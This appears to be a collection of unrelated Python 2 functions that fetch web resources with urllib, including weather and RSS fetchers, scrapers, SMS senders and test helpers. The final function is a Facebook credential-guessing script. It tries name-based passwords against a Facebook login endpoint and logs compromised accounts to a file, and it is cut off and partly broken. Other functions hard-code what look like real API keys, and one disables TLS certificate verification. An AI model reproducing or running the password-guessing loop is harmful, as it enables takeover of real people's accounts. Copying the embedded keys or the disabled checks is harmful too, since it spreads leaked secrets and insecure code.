def getTiempo(): dicc = {} code = urllib.urlopen("http://weather.yahooapis.com/forecastrss?w=468739&u=c") tempsmn = urllib.urlopen("http://www.smn.gov.ar/layouts/temperatura_layout.php").read().decode('iso-8859-1').encode("utf-8").split("º")[0] parse = et.parse(code) root = parse.getroot() tiempo = root[0][12][5].attrib dicc['temperatura'] = str(tempsmn) if (dicc['temperatura'] == ""): print getTime(), "[Tiempo] ADV: Temperatura de Yahoo" dicc['temperatura'] = str(tiempo['temp']) estadosArray = ['Tornado', 'Tormenta tropical', 'Huracán', "Tormentas fuertes", "Tormenta", "Lluvia y nieve", "Lluvia y aguanieve", "Aguanieve y nieve", "Llovizna helada", "Llovizna", "Lluvia helada", "Lluvia", "Lluvia", "Copos de nieve", "Lluvia ligera", "Nieve y viento", "Nieve", "Granizo", "Aguanieve", "Polvo", "Brumoso", "Neblina", "Humo", "Un poco ventoso", "Ventoso", "Frío", "Nublado", "Parcialmente nublado", "Parcialmente nublado", "Un poco nublado", "Un poco nublado", "Despejado", "Soleado", "Templado", "Templado", "Lluvia con piedras", "Caluroso", "Tormentas aisladas", "Tormentas dispersas", "Tormentas dispersas", "Lluvias Dispersas", "Fuertes Nevadas", "Nevada Leve Dispersa", "Fuertes Nevadas", "Parcialmente Nublado", "Chaparrón", "Nevada Leve", "Chaparrones Aislados"] dicc['estado'] = estadosArray[int(tiempo['code'])] dicc['icono'] = 'http://l.yimg.com/a/i/us/nws/weather/gr/'+ str(tiempo['code']) + dayOrNight(tiempo['date']) + '.png' dicc['minima'] = root[0][12][7].attrib['low'] dicc['maxima'] = root[0][12][7].attrib['high'] pronextarray = [] dicc['extendido'] = pronextarray for x in range(8,12): pronextarray.append({"dia" : root[0][12][x].attrib['day'], "fecha" : root[0][12][x].attrib['date'], "minima" : root[0][12][x].attrib['low'], "maxima" : root[0][12][x].attrib['high'], "estado" : estadosArray[int(root[0][12][x].attrib['code'])], "icono" : 'http://l.yimg.com/a/i/us/nws/weather/gr/'+ str(root[0][12][x].attrib['code']) + 'd.png'}) jsonString = json.dumps(dicc) jsonFile = open("../servicios/tiempo/serv.json", 'w') jsonFile.write(jsonString) jsonFile.close() print getTime(), "[Tiempo] JSON editado" threading.Timer(1800.0, getTiempo).start()
def _child_main_loop(self, queue): while True: url = "http://geekhost.net/OK" f = urllib.urlopen(url) data = f.read() #print data abcPattern = re.compile(r'OK') if abcPattern.match(data): queue.put('Already logined') else: queue.put('Need login') LOGIN_URL = 'https://auth-wlc.ntwk.dendai.ac.jp/login.html' #LOGIN_URL = 'http://geekhost.net/checkparams.php' pd = yaml.load(open('config.yaml').read().decode('utf-8')) pd['buttonClicked'] = '4' pd['redirect_url'] = 'http://google.com/' pd["err_flag"] = "0" pd["err_msg"] = "" pd["info_flag"] = "0" pd["info_msg"] = "" params = urllib.urlencode(pd) print repr(params) up = urllib.urlopen(LOGIN_URL, params) # あとは寝てる time.sleep(yaml.load(open('config.yaml').read().decode('utf-8'))['threadtime'])
def RepoSearch(url): if url is None: repeat= True else: repeat=False for np in range(1,maxpg+1): if repeat: url = "https://github.com/search?p="+ str(np) +"&q="+search+"&type=Repositories" else: if np >1: return page = html.fromstring(urllib.urlopen(url).read()) if len(page.find_class('repo-list-name')) ==0: tmp = "Too many requests" if urllib.urlopen(url).read().find(tmp) != -1: print col.FAIL, col.BOLD,"Due to GitHub policy you can't make too many request, wait a minute!",col.ENDC break if np==1: print col.FAIL, col.BOLD,"Repo not found", col.ENDC break for link in page.find_class('repo-list-name'): rep = link.getchildren()[0].get('href') print rep,":" print col.OKBLUE,col.BOLD, "\thttps://github.com"+rep+".git\n", col.ENDC return
def _TreeStatusTestHelper(self, tree_status, general_state, expected_return, retries_500=0, max_timeout=0): """Tests whether we return the correct value based on tree_status.""" return_status = self._TreeStatusFile(tree_status, general_state) self.mox.StubOutWithMock(urllib, 'urlopen') status_url = 'https://chromiumos-status.appspot.com/current?format=json' backoff = 1 sleep_timeout = 1 for _attempt in range(retries_500): urllib.urlopen(status_url).AndReturn(return_status) return_status.getcode().AndReturn(500) time.sleep(backoff) backoff *= 2 urllib.urlopen(status_url).MultipleTimes().AndReturn(return_status) # Time is checked twice to bootstrap. start_time = 1 self.mox.StubOutWithMock(time, 'time') time.time().AndReturn(start_time) time.time().AndReturn(start_time) if expected_return == False: for time_plus in xrange(max_timeout + 1): time.time().AndReturn(start_time + time_plus) self.mox.StubOutWithMock(cros_build_lib, 'Info') cros_build_lib.Info(mox.IgnoreArg(), mox.IgnoreArg()).MultipleTimes() time.sleep(sleep_timeout).MultipleTimes() return_status.getcode().MultipleTimes().AndReturn(200) return_status.read().MultipleTimes().AndReturn(return_status.json) self.mox.ReplayAll() self.assertEqual(cros_build_lib.TreeOpen(status_url, sleep_timeout, max_timeout), expected_return) self.mox.VerifyAll()
def find_proxy( url, timeout, testing_url): try: response = urllib.urlopen( url ) except: if Debug: print "Request to get proxy failed." return (False, False) result=response.getcode() content = response.read() data = json.loads( content ) if Debug: print data['curl'] start_time = time.time() try: response = urllib.urlopen(testing_url, proxies={'http':data['curl']}) except: if Debug: print "Proxy test request failed." return (False, False) result=response.getcode() request_time = time.time() - start_time if result == 200: if Debug: print "\n\nGot test url with %d in %f seconds" % (result, request_time) return (data['curl'], request_time) else: if Debug: print "Failed with %d" % result return (False, False)
def wikipedia(self, artistname): # Get a file-like object for the Python Web site's home page. values = [] months = [] wiki = {} for i in range(1,13): if i < 10: yearmonth = "20130" + str(i) else: yearmonth = "2013" + str(i) website = "http://stats.grok.se/en/" + yearmonth + "/" + artistname f = urllib.urlopen(website) s = f.read() regex = re.compile("has been viewed (\d*)") r = regex.search(s) wiki[yearmonth] = int(r.groups()[0]) values.append(int(r.groups()[0])) months.append(yearmonth) f.close() for i in range(1,4): yearmonth = "20140" + str(i) website = "http://stats.grok.se/en/" + yearmonth + "/" + artistname f = urllib.urlopen(website) s = f.read() regex = re.compile("has been viewed (\d*)") r = regex.search(s) wiki[yearmonth] = int(r.groups()[0]) values.append(int(r.groups()[0])) months.append(yearmonth) f.close() print "finished wiki" return [values, months]
def wait_on_app(port): """ Waits for the application hosted on this machine, on the given port, to respond to HTTP requests. Args: port: Port where app is hosted on the local machine Returns: True on success, False otherwise """ backoff = INITIAL_BACKOFF_TIME retries = MAX_FETCH_ATTEMPTS private_ip = appscale_info.get_private_ip() url = "http://" + private_ip + ":" + str(port) + FETCH_PATH while retries > 0: try: urllib.urlopen(url) return True except IOError: retries -= 1 logging.warning("Application was not up at %s, retrying in %d seconds"%\ (url, backoff)) time.sleep(backoff) backoff *= 2 logging.error("Application did not come up on %s after %d attemps"%\ (url, MAX_FETCH_ATTEMPTS)) return False
def main(): html = urllib.urlopen("http://bankpro.jrj.com.cn/json/f.jspa?size=500&pn=1&t={%22xszt%22:%220%22,%22st%22:%220%22,%22xsdq%22:%22-1,-1%22,%22sort%22:%22sell_org_date%22,%22order%22:%22desc%22,%22wd%22:%22%22}").read() run(html) time.sleep(1) html = urllib.urlopen("http://bankpro.jrj.com.cn/json/f.jspa?size=500&pn=1&t={%22xszt%22:%221%22,%22st%22:%220%22,%22xsdq%22:%22-1,-1%22,%22sort%22:%22sell_org_date%22,%22order%22:%22desc%22,%22wd%22:%22%22}").read() run(html) time.sleep(1)
def run( self ): """Executes the body of the script.""" logging.info("Log level set to INFO") logging.debug("Log Level set to DEBUG") jobNumber = self.jobNumber #print jobNumber #print jobNumber[:3] portalURL = self.server home = '/home/sbsuser/pacbio/raw/' splicehome = '/pacbio/raw' ext = self.opts.ext #print ext records = set() if ext == "ccs_reads.fastq": cmd = 'wget http://node1.1425mad.mssm.edu/pacbio/secondary/%s/%s/data/ccs_reads.fastq' % (jobNumber[:3],jobNumber) logging.info(cmd) os.system(cmd) elif ext == "cmp.h5": #logIn = urllib.urlopen('http://node1.1425mad.mssm.edu/pacbio/secondary/%s/%s/data/aligned_reads.cmp.h5' % (jobNumber[:3],jobNumber)) cmd = 'wget http://node1.1425mad.mssm.edu/pacbio/secondary/%s/%s/data/aligned_reads.cmp.h5' % (jobNumber[:3],jobNumber) logging.info(cmd) os.system(cmd) elif ext == "bax.h5": logIn = urllib.urlopen('http://node1.1425mad.mssm.edu/pacbio/secondary/%s/%s/log/smrtpipe.log' % (jobNumber[:3],jobNumber)) for line in logIn: if home in line: ll = line.split(" ") #print "starting a new set:" #print ll #print "raw: ", line line = ll[-3] #print "split: ", line #print portalURL #print line[line.find(splicehome):line.find("bax.h5")] #print ext if not "m" in line[line.find(splicehome):line.find("bax.h5")]: continue records.add(portalURL+line[line.find(splicehome):line.find("bax.h5")] + ext) records.add(portalURL+line[line.find(splicehome):line.find("bax.h5")-2] + "bas.h5") #print records else: print >>sys.stderr, "Not supported file type!" for address in records: logging.info(address) fileIn = urllib.urlopen(address) if self.opts.noprefix: fileout = open(address.split('/')[-1],'w') else: fileout = open(self.prefix+address.split('/')[-1],'w') fileout.write(fileIn.read()) fileout.close() return 0
def send_sms(self, phone, content): try: params = {'phone':phone, 'content':content} data = urllib.urlencode(params) smsUrl = 'http://yw.admin.youja.cn/sms' urllib.urlopen(smsUrl, data=data) except:pass
def get(self, action=""): url = self.request.get("url") try: #bit.ly result = urllib.urlopen("http://api.bit.ly/v3/shorten?login=crowy&apiKey=R_57bab6c0fb01da4e1e0a5e22f73c3a4a&format=json&longUrl=%s" % urllib.quote(url)).read() json = simplejson.loads(result) if json['status_code'] == 200: self.response.out.write(json['data']['url']) return else: logging.warn(result) except: logging.warn("Unexpected error.") try: #goo.gl api_url = 'https://www.googleapis.com/urlshortener/v1/url?key=AIzaSyBRoz9ItBIQgHwWbZbmkF45dFiRKub2XzI&userip='+self.request.remote_addr post_data = simplejson.dumps({'longUrl':url}) result = urlfetch.fetch(url=api_url, payload=post_data, method=urlfetch.POST, headers={'Content-Type': 'application/json'}) if result.status_code == 200: result = simplejson.loads(result.content) self.response.out.write(result['id']) return else: logging.warn(result.content) except: logging.warn("Unexpected error.") try:#tinyurl short_url = urllib.urlopen("http://tinyurl.com/api-create.php?url=%s" % urllib.quote(url)) self.response.out.write(short_url.read()) return except: logging.warn("Unexpected error.") self.error(400)
def requires(): print "** COORDINATOR **" # print redwood_host ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE # now query the metadata service so I have the mapping of bundle_uuid & file names -> file_uuid print str("https://"+redwood_host+":8444/entities?page=0") json_str = urlopen(str("https://"+redwood_host+":8444/entities?page=0"), context=ctx).read() metadata_struct = json.loads(json_str) print "** METADATA TOTAL PAGES: "+str(metadata_struct["totalPages"]) for i in range(0, metadata_struct["totalPages"]): print "** CURRENT METADATA TOTAL PAGES: "+str(i) json_str = urlopen(str("https://"+redwood_host+":8444/entities?page="+str(i)), context=ctx).read() metadata_struct = json.loads(json_str) for file_hash in metadata_struct["content"]: bundle_uuid_filename_to_file_uuid[file_hash["gnosId"]+"_"+file_hash["fileName"]] = file_hash["id"] #print bundle_uuid_filename_to_file_uuid # HACK!!! Please remove once the behavior has been fixed in the workflow!! if file_hash["fileName"].endswith(".sortedByCoord.md.bam"): bundle_uuid_filename_to_file_uuid[file_hash["gnosId"] + "_sortedByCoord.md.bam"] = file_hash[ "id"] if file_hash["fileName"].endswith(".tar.gz"): bundle_uuid_filename_to_file_uuid[file_hash["gnosId"] + "_tar.gz"] = file_hash[ "id"] if file_hash["fileName"].endswith(".wiggle.bg"): bundle_uuid_filename_to_file_uuid[file_hash["gnosId"] + "_wiggle.bg"] = file_hash[ "id"]
def parseresultpage(page, search, order, sort, regex): logger.info(" [+] Pulling results from page " + str(page)) githubbase = "https://github.com/search?" githubsearchurl = {"o": order, "p": page, "q": search, "s": sort, "type": "Code", "ref": "searchresults"} searchurl = githubbase + str(urlencode(githubsearchurl)) pagehtml = urlopen(searchurl).read() soup = BeautifulSoup(pagehtml, "html.parser") # Find GitHub div with code results results = soup.findAll("div", attrs={"class": "code-list-item"}) # Pull url's from results and hit each of them soup1 = BeautifulSoup(str(results), "html.parser") for item in soup1.findAll("p", attrs={"class": "full-path"}): soup2 = BeautifulSoup(str(item), "html.parser") for link in soup2.findAll("a"): individualresult = "https://github.com" + str(link["href"]) individualresultpage = urlopen(individualresult).read() soup3 = BeautifulSoup(str(individualresultpage), "html.parser") for rawlink in soup3.findAll("a", attrs={"id": "raw-url"}): rawurl = "https://github.com" + str(rawlink["href"]) if args.custom_regex: searchcode(rawurl, regex) else: wpsearchcode(rawurl, regex)
def parseFeed(): linklist = [] info = [] d = feedparser.parse('http://news.google.com/news?pz=1&cf=all&ned=us&hl=en&output=rss') feedlink = d.feed.link site = urllib.urlopen(feedlink).read() parsed = parser.feed(site) j = 0 foundlinks = False for line in parsed: #if foundlinks: #print line if "attr" in line and "links" in line: foundlinks = True print line links = [] i = 2 x = 0 for link in links: linklist.append(link.firstChild.nodeValue) page = urllib.urlopen(link.firstChild.nodeValue).read() info.append(re.search('h',page)) i = i - 1 if i == 0: break #for item in info: # x = x+1 return info
def downloadPSSOPage(self): username = self.lineEdit.text() password = self.lineEdit_2.text() login_url = 'https://psso.fh-koeln.de/qisserver/rds?state=user&type=1&category=auth.login&startpage=portal.vm&breadCrumbSource=portal' params = urllib.urlencode({'asdf': username, 'fdsa': password, 'submit':'Login'}) # lol html_1 = urllib.urlopen(login_url, params).read() if not noten.checkLogin(html_1): self.showErrorPopup(u"Sind die Login Daten möglicherweise falsch?") return try: # Von hier an simulieren wir einen Crawler html_2 = urllib.urlopen(noten.getLinkByName(html_1, "Prüfungsverwaltung")).read() html_3 = urllib.urlopen(noten.getLinkByName(html_2, "Notenspiegel")).read() html_4 = urllib.urlopen(noten.getLinkByName(html_3, re.compile("Abschluss"))).read() html_5 = urllib.urlopen(noten.getLinkByGraphic(html_4, "/QIS/images//his_info3.gif")).read() except TypeError as e: self.showErrorPopup(u"Scheinbar haben sich die PSSO Seiten verändert… Sag' bitte Hugo bescheid, damit er das Programm reparieren kann!") return try: anz_noten, anz_credits, schnitt = noten.getInfos(html_5) name = noten.getStudentName(html_5) self.presentResults(anz_noten, anz_credits, schnitt, name) except noten.ParsingError as e: self.showErrorPopup(str(e))
def image(title,id): titleUrl = "http://de.wikipedia.org/w/api.php?action=query&titles="+title+"&prop=images&format=json" imgJson = simplejson.loads(urllib.urlopen(titleUrl).read()) imageUrl = None if imgJson['query']['pages'].has_key(id): if imgJson['query']['pages'][id].has_key('images'): if imgJson['query']['pages'][id]['images'][0]: imageTitle = imgJson['query']['pages'][id]['images'][0]['title'] imageTitle = imageTitle.encode('utf-8') imageTitleUrl = "http://de.wikipedia.org/w/api.php?action=query&titles="+imageTitle+"&prop=imageinfo&iiprop=url&format=json" imgTitleJson = simplejson.loads(urllib.urlopen(imageTitleUrl).read()) if imgTitleJson['query']['pages'].has_key("-1"): if imgTitleJson['query']['pages']['-1'].has_key('imageinfo') : imageUrl = imgTitleJson['query']['pages']['-1']['imageinfo'][0]['url'] elif imgTitleJson['query']['pages'].has_key('id'): if imgTitleJson['query']['pages']['id'].has_key('imageinfo'): imageUrl = imgTitleJson['query']['pages']['id']['imageinfo'][0]['url'] return imageUrl
def _stop_server(cls): import urllib # Yup, that's right. try: urllib.urlopen(cls.scheme + '://' + cls.host + ':' + str(cls.port) + '/shutdown') except IOError: pass cls.server_thread.join()
def main(max_base, separator='\t'): f = urllib.urlopen("http://bealstreasure.com/members/getwork.php?username="******"&max_base=" + str(max_base)).read() warning("f: ", f) tmp_vals = f.split(",") warning("tmp_vals: ", tmp_vals) (m, n, set_id) = (int(tmp_vals[0]),int(tmp_vals[1]),tmp_vals[2]) max_exp = max([m, n]) table = initial_data_table(max_base, m, n) if (max_exp < max([m, n]) + 10): table = initial_data_table(max_base, m, n) max_exp = max([m, n]) powx, powy = initial_data_pow(max_base, m, n) for x in xrange(1, max_base): powx_tmp = powx[x] for y in xrange(1, x): if gcd(x,y) > 1: continue sum = powx_tmp + powy[y] zr = table.get(sum) if zr: report(x, m, y, n) f = urllib.urlopen("http://bealstreasure.com/members/savework.php?result=false&memory=" + str(memory) + "&id=" + str(set_id)).read() printing("(%d, %d, %s)" % (m, n, set_id))
def update(self): playlist_id_query = 'https://www.googleapis.com/youtube/v3/channels?' \ 'part=contentDetails&id=%s&key=%s' % \ (self.config['channel_id'], self.config['api_key']) file_a = urllib.urlopen(playlist_id_query) playlist_response = json.loads(file_a.read()) playlist_id = playlist_response['items'][0]['contentDetails']\ ['relatedPlaylists']['uploads'] query = "https://www.googleapis.com/youtube/v3/playlistItems?" \ "part=snippet&playlistId=%s&key=%s" % \ (playlist_id, self.config['api_key']) file_b = urllib.urlopen(query) raw = file_b.read() response = json.loads(raw) for entry in response['items']: snippet = entry['snippet'] video_id = snippet['resourceId']['videoId'] video_url = 'https://www.youtube.com/watch?v=%s' % video_id link = video_url try: image_url = snippet['thumbnails']['maxres'].get('url') except KeyError: image_url = snippet['thumbnails']['high'].get('url') self.create_story( link, title=snippet.get('title'), body=snippet['description'], image_url=image_url, timestamp=datetime.strptime( snippet['publishedAt'], '%Y-%m-%dT%H:%M:%S.000Z' ), )
def Configure(self, prefix="XBMC-Event", xbmcip="192.168.1.1", xbmchttpport=8080, zone="224.0.0.2", port=8278, selfXbmceventbroadcast=False, payDelim="<b></b>"): panel = eg.ConfigPanel(self) editCtrl = panel.TextCtrl(prefix) xbmcipCtrl = panel.TextCtrl(xbmcip) xbmchttpportCtrl = panel.SpinIntCtrl(xbmchttpport, min=1, max=65535) zoneCtrl = panel.TextCtrl(zone) portCtrl = panel.SpinIntCtrl(port, min=1, max=65535) selfXbmceventbroadcastCtrl=panel.CheckBox(selfXbmceventbroadcast) payDelimCtrl = panel.TextCtrl(payDelim) panel.AddLine(self.text.eventPrefix, editCtrl) panel.AddLine(self.text.xbmcip, xbmcipCtrl) panel.AddLine(self.text.xbmchttpport, xbmchttpportCtrl) panel.AddLine(self.text.zone, zoneCtrl) panel.AddLine(self.text.port, portCtrl) panel.AddLine(self.text.selfXbmceventbroadcast,selfXbmceventbroadcastCtrl) panel.AddLine("Payload Delimiter", payDelimCtrl) while panel.Affirmed(): panel.SetResult(editCtrl.GetValue(),xbmcipCtrl.GetValue(),int(xbmchttpportCtrl.GetValue()),zoneCtrl.GetValue(),int(portCtrl.GetValue()),selfXbmceventbroadcastCtrl.GetValue(), payDelimCtrl.GetValue() ) v_header = urllib.quote("This is the Header") v_message = urllib.quote("This is the Message") host_xbmc = xbmcipCtrl.GetValue() port_xbmc = int(xbmchttpportCtrl.GetValue()) udp_xbmc = int(portCtrl.GetValue()) url_xbmc = "http://" + str(host_xbmc) + ":" + str(port_xbmc) + "/xbmcCmds/xbmcHttp?command=SetBroadcast¶meter=2;" + str(udp_xbmc) + "(Notification(" + v_header + "," + v_message + "))" print "str(url_xbmc)" try: urllib.urlopen(url_xbmc) except IOError: print 'Connection error'
def ping_google(sitemap_url=None, ping_url=PING_URL): """ Alerts Google that the sitemap for the current site has been updated. If sitemap_url is provided, it should be an absolute path to the sitemap for this site -- e.g., '/sitemap.xml'. If sitemap_url is not provided, this function will attempt to deduce it by using urlresolvers.reverse(). """ if sitemap_url is None: try: # First, try to get the "index" sitemap URL. sitemap_url = urlresolvers.reverse('django.contrib.sitemaps.views.index') except urlresolvers.NoReverseMatch: try: # Next, try for the "global" sitemap URL. sitemap_url = urlresolvers.reverse('django.contrib.sitemaps.views.sitemap') except urlresolvers.NoReverseMatch: pass if sitemap_url is None: raise SitemapNotFound("You didn't provide a sitemap_url, and the sitemap URL couldn't be auto-detected.") from django.contrib.sites.models import Site current_site = Site.objects.get_current() url = "http://%s%s" % (current_site.domain, sitemap_url) params = urllib.urlencode({'sitemap':url}) urllib.urlopen("%s?%s" % (ping_url, params))
def main_loop(self): while True: try: time.sleep(1) this_dir = os.listdir(os.getcwd()) that_dir = eval(urllib.urlopen(self.url + "/list/" + self.username + "/" + self.password).read()) if str(this_dir) != str(that_dir): for this in this_dir: if this not in self.files and this != sys.argv[0]: with open(this, "rb") as md5file: print "added", this self.files[this] = hashlib.md5(md5file.read()).hexdigest() if this not in that_dir and this != sys.argv[0]: thread.start_new_thread(self.upload, (this,)) for that in that_dir: if that not in this_dir: thread.start_new_thread(self.download, (that,)) for file in self.files: try: with open(file, "rb") as check_file: check = hashlib.md5(check_file.read()).hexdigest() if check != self.files[file]: print file, "changed" urllib.urlopen( self.url + "/delete/" + self.username + "/" + self.password + "/" + file ) self.files[file] = check thread.start_new_thread(self.upload, (file,)) except IOError: pass except IOError: print "It seems as though your server is down, please check it." time.sleep(60)
def get_cur(self): types = ('alpha','beta','pre','rc',None,'p') version = self.base[0] if self.opts.version is not None: version = self.opts.version type = self.base[1] if self.opts.type == 'tagged': type = 4 self.opts.hash = None elif self.opts.type is not None: type = types.index(self.opts.type) if self.opts.branch: self.branch = self.opts.branch elif type < 4: self.branch = 'master' else: self.branch = 'fixes/{0}'.format('.'.join(version.split('.')[0:2])) if type != 4: if self.opts.hash is None: commit = json.load(urllib.urlopen("https://api.github.com/repos/mythtv/MythTV/commits/" + urllib.quote(self.branch, ''))) self.opts.hash = commit['sha'] if self.opts.date is None: self.opts.date = process_date(commit['commit']['committer']['date']).strftime('%Y%m%d') print "Autoselecting hash: "+self.opts.hash elif self.opts.date is None: commit = json.load(urllib.urlopen("https://api.github.com/repos/mythtv/MythTV/commits/" + self.opts.hash)) self.opts.date = process_date(commit['commit']['committer']['date']).strftime('%Y%m%d') self.cur = (version, type, self.opts.date) if self.opts.verbose: print 'New version set to: {0}-{1}'.format(self.name,self.get_version(self.cur))
def update_urls(): workers = itertools.cycle(models.get_workers()) remote_urls = models.get_urls_to_check() for url in remote_urls: response = _make_request(workers.next(), url) for subscriber in url.subscribers: urllib.urlopen(subscriber.callback, data=response)
def __init__(self, versions): self.versions = versions resp = urllib.urlopen("https://issues.apache.org/jira/rest/api/2/field") data = json.loads(resp.read()) self.fieldIdMap = {} for part in data: self.fieldIdMap[part['name']] = part['id'] self.jiras = [] at=0 end=1 count=100 while (at < end): params = urllib.urlencode({'jql': "project in (HADOOP,HDFS,MAPREDUCE,YARN) and fixVersion in ('"+"' , '".join(versions)+"') and resolution = Fixed", 'startAt':at, 'maxResults':count}) resp = urllib.urlopen("https://issues.apache.org/jira/rest/api/2/search?%s"%params) data = json.loads(resp.read()) if (data.has_key('errorMessages')): raise Exception(data['errorMessages']) at = data['startAt'] + data['maxResults'] end = data['total'] self.jiras.extend(data['issues']) self.iter = self.jiras.__iter__()
def getRss(): codert = urllib.urlopen("http://actualidad.rt.com/feeds/all.rss?rss=1") codetn = urllib.urlopen("http://www.tn.com.ar/rss.xml") codeinfobae = urllib.urlopen("http://cdn01.ib.infobae.com/adjuntos/162/rss/Infobae.xml") #codetelam = urllib.urlopen("http://www.telam.com.ar/rss2/ultimasnoticas.xml") jsonrt = {"rss" : base64.b64encode(codert.read())} filert = open("../servicios/rt/serv.json", 'w') filert.write(json.dumps(jsonrt)) filert.close() jsontn = {"rss" : base64.b64encode(codetn.read())} filetn = open("../servicios/tn/serv.json", 'w') filetn.write(json.dumps(jsontn)) filetn.close() jsoninfobae = {"rss" : base64.b64encode(codeinfobae.read())} fileinfobae = open("../servicios/infobae/serv.json", 'w') fileinfobae.write(json.dumps(jsoninfobae)) filert.close() '''filetelam = open("../servicios/telam/rss.xml", 'w') filetelam.write(codetelam.read()) filetelam.close()''' print getTime(),"[RSS] RSS's actualizados" threading.Timer(300.0, getRss).start()
def SendSms(self,text="Default text message"): deltaT=datetime.now()-self.last_sms if deltaT.seconds>self.min_period or self.sent==0: if self.settings.debug>0: logging.info("Debug SMS sent %s " %time.strftime("%I:%M:%S %p", time.localtime())) self.sent=1 return 1 else: self.last_sms=datetime.now() self.config={} self.config['username']=self.username self.config['password']=self.password #needs to be changed with international prefix what an hassle! self.config['to']=self.to self.config['from']=self.sender self.config['text']=text self.config['maxconcat']=self.MaxConCatMsgs query = urllib.urlencode(self.config) try: if self.UseProxies>0 : file = urllib.urlopen(self.url1+self.pushpage, query,proxies=self.proxies) else: file = urllib.urlopen(self.url1+self.pushpage, query,proxies=None) except IOError, (errno): logging.error ("Error delivering online SMS %s " %errno) return 0 self.sent=1 self.output = file.read() file.close() logging.info("Message sent to %s from %s" % (self.to, self.sender)) #return self.ParseRequest() return 1
def run(self): use_selection = 0 if self.parent.ch_lyrics_song_list.GetSelection() >= 0: use_selection = self.parent.ch_lyrics_song_list.GetSelection() #print query_string url_connection = urllib.urlopen(self.query_string.replace(' ', '+')) raw_results = url_connection.read() results_array = raw_results.split('\n') #print results_array self.parent.ch_lyrics_song_list.Clear() for x in results_array: y = x.split('\\')[1] self.parent.ch_lyrics_song_list.Append(y) if len(results_array) >= 1: if use_selection > (len(results_array) - 1): use_selection = 0 self.parent.ch_lyrics_song_list.SetSelection(use_selection) lyrics_id = results_array[use_selection].split('\\')[0] #print lyrics_id #http://www.lyrdb.com/getlyr.php?q=id lyrics_query = 'http://www.lyrdb.com/getlyr.php?q=' + lyrics_id lyrics_query = url_quote(lyrics_query) try: url_connection = urllib.urlopen(lyrics_query.replace(' ', '+')) raw_results = url_connection.read() except Exception, expt: raw_results = str(Excpetion) + ' ' + str(expt)
def main(): search_str = sys.argv[1] movie_ID_list = [] pair=[] calls = 0 #movie_ID_name movie_ID_name_csv.write("Id,Label\n") for i in range(1,7): if (calls == 4): time.sleep(1) response = urllib.urlopen(search_url+str(i)) calls = (calls+1)%5 data = json.loads(response.read()) #print "ID: ",data["movies"][0]["id"],", Title: ",data["movies"][0]["title"] for movie in data["movies"]: movie_ID_name.write(movie["id"]+","+movie["title"]+"\n") movie_ID_name_csv.write(movie["id"]+","+movie["title"]+"\n") movie_ID_list.append(movie["id"]) #movie_ID_sim_movie_ID movie_ID_sim_movie_ID_csv.write("Source,Target,Type\n") for movie_id in movie_ID_list: if (calls == 4): time.sleep(1) response = urllib.urlopen(sim_url1+movie_id+sim_url2) calls = (calls+1)%5 data = json.loads(response.read()) for movie in data["movies"]: if([movie["id"],movie_id] in pair): continue movie_ID_sim_movie_ID.write(movie_id+","+movie["id"]+"\n") movie_ID_sim_movie_ID_csv.write(movie_id+","+movie["id"]+",Undirected\n") pair.append([movie_id,movie["id"]])
def check_update(): """ check new version in remote server, and paste new release note :return:NONE """ current_version = u'1.0.1.zip' try: url_path = urlopen("http://www-tac.cisco.com/~yalv/development/Zenus/download/mac/") raw_html = url_path.read().decode('utf-8') pattern = re.compile('.{6}zip') update_version = max(list(set(pattern.findall(raw_html)))) if update_version > current_version: print(colored('=' * line_length, 'green')) print(colored(" New Version %s Found, Go to following link to download:" % update_version[:-4], 'green')) print(colored(" http://www-tac.cisco.com/~yalv/development/Zenus/Zenus.EN.html", 'green')) print("OR") print(colored(" http://www-tac.cisco.com/~yalv/development/Zenus/Zenus.CN.html", 'green')) print("") note_raw = urlopen("http://www-tac.cisco.com/~yalv/development/Zenus/download/mac/note") notes = note_raw.read() print(colored(notes, 'green')) print(colored('=' * line_length, 'green')) else: pass except: pass
def searchWord(word): url = r'http://fanyi.youdao.com/openapi.do?keyfrom=<yourname>&key=<yourkey>&type=data&doctype=json&version=1.1&q=' + word f = urlopen(url) jsonStr = f.read() getData(jsonStr)
def get_page(url): try: import urllib return urllib.urlopen(url).read() except: return ""
def main(arg): global cekpoint, oks user = arg try: os.mkdir('out') except OSError: pass try: a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket) b = json.loads(a.text) pass1 = b['first_name'] + '786' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass1 + ' 😋 ' + b[ 'name'] oks.append(user + pass1) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass1 + ' 😋 ' + b[ 'name'] cek = open("out/CP.txt", "a") cek.write(user + "|" + pass1 + "\n") cek.close() cekpoint.append(user + pass1) else: pass2 = b['first_name'] + '123' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = json.load(dafa) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass2 + ' 👽 ' + b[ 'name'] oks.append(user + pass2) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass2 + ' 👽 ' + b[ 'name'] cek = open("out/CP.txt", "a") cek.write(user + "|" + pass2 + "\n") cek.close() cekpoint.append(user + pass2) else: pass3 = b['first_name'] + '12345' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = json.load(wifi) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass3 + ' 👽 ' + b[ 'name'] oks.append(user + pass3) else: if 'www.facebook.com' 